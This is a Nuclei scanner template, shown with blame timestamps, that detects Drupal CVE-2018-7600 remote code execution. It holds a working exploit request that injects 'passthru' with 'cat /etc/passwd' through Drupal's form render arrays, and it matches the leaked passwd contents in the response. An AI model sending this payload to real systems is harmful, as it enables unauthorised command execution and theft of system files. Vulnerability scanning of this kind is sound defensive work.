nuclei-templates/http/cves/2018/CVE-2018-7600.yaml

75 lines
2.7 KiB
YAML
Raw Normal View History

2021-02-15 13:33:33 +00:00
id: CVE-2018-7600
info:
name: Drupal - Remote Code Execution
2021-02-15 13:33:33 +00:00
author: pikpikcu
severity: critical
description: Drupal before 7.58, 8.x before 8.3.9, 8.4.x before 8.4.6, and 8.5.x before 8.5.1 allows remote attackers to execute arbitrary code because of an issue affecting multiple subsystems with default or common module configurations.
2023-09-06 12:57:14 +00:00
remediation: |
Upgrade to the latest version of Drupal or apply the official patch provided by Drupal security team.
reference:
- https://github.com/vulhub/vulhub/tree/master/drupal/CVE-2018-7600
- https://nvd.nist.gov/vuln/detail/CVE-2018-7600
- https://www.drupal.org/sa-core-2018-002
- https://groups.drupal.org/security/faq-2018-002
2023-07-15 16:29:17 +00:00
- http://www.securitytracker.com/id/1040598
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2018-7600
cwe-id: CWE-20
epss-score: 0.97555
epss-percentile: 0.99995
2023-09-06 12:57:14 +00:00
cpe: cpe:2.3:a:drupal:drupal:*:*:*:*:*:*:*:*
2022-07-07 06:45:53 +00:00
metadata:
max-request: 1
2023-07-11 19:49:27 +00:00
vendor: drupal
product: drupal
2023-09-06 12:57:14 +00:00
shodan-query: http.component:"drupal"
2023-07-12 11:56:50 +00:00
tags: cve,cve2018,drupal,rce,kev,vulhub,intrusive
2021-02-15 13:33:33 +00:00
http:
2021-02-15 13:33:33 +00:00
- raw:
- |
POST /user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax HTTP/1.1
Host: {{Hostname}}
Accept: application/json
Referer: {{Hostname}}/user/register
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------99533888113153068481322586663
-----------------------------99533888113153068481322586663
Content-Disposition: form-data; name="mail[#post_render][]"
passthru
-----------------------------99533888113153068481322586663
Content-Disposition: form-data; name="mail[#type]"
markup
-----------------------------99533888113153068481322586663
Content-Disposition: form-data; name="mail[#markup]"
cat /etc/passwd
-----------------------------99533888113153068481322586663
Content-Disposition: form-data; name="form_id"
user_register_form
-----------------------------99533888113153068481322586663
Content-Disposition: form-data; name="_drupal_ajax"
matchers-condition: and
matchers:
- type: word
part: header
2023-07-11 19:49:27 +00:00
words:
- application/json
2021-02-15 17:09:32 +00:00
2021-02-15 13:33:33 +00:00
- type: regex
2023-07-11 19:49:27 +00:00
part: body
2021-02-15 13:33:33 +00:00
regex:
- "root:.*:0:0:"
2021-02-15 17:09:32 +00:00
2021-02-15 13:33:33 +00:00
- type: status
status:
- 200
# digest: 4a0a00473045022012abc4e8f9f45fa4dec5d3f4208be8ad08505309d907e294ad9f987dc8949924022100a16a14e83b4ecc616e9d11686be7bb63d5c07a5783b1c0ec91a8bfd64a43ee4e:922c64590222798bb761d5b6d8e72950